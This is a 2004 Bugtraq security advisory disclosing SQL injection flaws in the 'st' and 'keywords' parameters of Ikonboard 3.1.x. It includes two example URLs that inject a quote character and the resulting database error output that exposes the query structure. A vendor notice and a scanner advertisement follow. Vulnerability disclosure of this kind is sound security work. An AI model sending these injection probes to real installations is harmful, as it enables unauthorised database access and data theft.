[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [MaxPatrol] SQL-injection in Ikonboard 3.1.x
From: Alexander Anisimov <anisimov () ptsecurity ! com>
Date: 2004-12-16 17:02:27
Message-ID: 20041216225108.29333.qmail () www ! securityfocus ! com
[Download RAW message or body]
[MaxPatrol] SQL-injection in Ikonboard 3.1.x
Release Date: December 16, 2004
Date Reported: December 2, 2004
Severity: High
Application: Ikonboard 3.1.x
Affects versions: 3.1.0, 3.1.1, 3.1.2 and 3.1.3.
Platform: PHP
I. DESCRIPTION
Input passed to the "st" and "keywords" parameters in "ikonboard.cgi" is not properly \
sanitised before being used in a SQL query. This can be exploited to manipulate SQL \
queries by injecting arbitrary SQL code.
1) SQL injection in "st" parameter
Example:
http://host/support/ikonboard.cgi?act=ST&f=27&t=13066&hl=nickname&st=1'
Result:
Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
Can't query the data from 'forum_posts' Reason: You have an error in your SQL syntax. \
Check the manual that corresponds to your MySQL server version for the right syntax \
to use near '', 20'
This error was reported at: line 1 Query: SELECT * FROM iB313_forum_posts WHERE \
TOPIC_ID = '13066' AND QUEUED <> '1' ORDER BY POST_DATE ASC LIMIT 1', 20
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------
2) SQL injection in "keywords" parameter
Example:
http://host/support/ikonboard.cgi?act=Search&CODE=01&keywords='&type=name&forums=all&search_in=all&prune=0
Result:
Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
mySQL error
Can't query the data: You have an error in your SQL syntax. Check the manual that \
corresponds to your MySQL server version for the right syntax to use near ') ORDER BY \
DATE DESC LIMIT 0,200'
This error was reported at: line 1
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------
This vulnerability found automatically by full-featured commercial version of \
MaxPatrol.
II. IMPACT
A remote user may be able to execute arbitrary SQL commands on the underlying \
database.
III. SOLUTION
Not available currently.
IV. VENDOR FIX/RESPONSE
Notified.
V. CREDIT
This vulnerability was discovered by Positive Technologies using MaxPatrol
(http://www.maxpatrol.com) - intellectual professional security scanner.
It is able to detect a substantial amount of vulnerabilities not published
yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic